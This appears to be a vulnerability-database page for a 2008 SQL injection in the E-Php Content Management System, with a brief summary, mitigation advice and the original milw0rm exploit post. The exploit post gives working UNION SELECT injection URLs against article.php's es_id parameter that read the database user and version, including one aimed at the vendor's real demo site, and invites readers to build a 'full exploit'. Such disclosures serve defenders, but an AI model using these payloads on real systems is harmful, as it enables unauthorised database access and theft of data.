E-Php Content Management System

vendor:

by:

HaCker_Egy

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: E-Php Content Management System

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

E-Php Content Management System

An attacker can exploit this vulnerability by sending a crafted HTTP request containing malicious SQL statements to the vulnerable application. This can allow the attacker to gain access to sensitive information stored in the database, modify data, or even execute system level commands.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL statements.

Source

Exploit-DB raw data:

############################################################
############# E-Php Content Management System ######################
## HaCker_Egy ;
## Contact : hacker_egy@hotmail.com
## Home : pal-hacker.com & atsdp.com
===============================================
# Script :  E-Php Content Management System
# Download : http://www.ephpscripts.com
===============================================
# Exploit :
           ==>> www.target.com/article.php?es_id=-1+union+select+1,current_user,3,4,5,6,7,8,9,10,11,12/*
         
     ==>> www.target.com/article.php?es_id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12/*
    
# live Demo :
             
    ==>> http://www.ephpscripts.com/demo/cms/article.php?es_id=-1+union+select+1,current_user,3,4,5,6,7,8,9,10,11,12/*
   
## Note : use your mind to get Full exploit D: 
   
===============================================================
## GREETZ : Mr.SQL , GOLD_M , H-T Team , His0k4 , Dark , stack ,Mohamed el arab
===============================================================

# milw0rm.com [2008-09-18]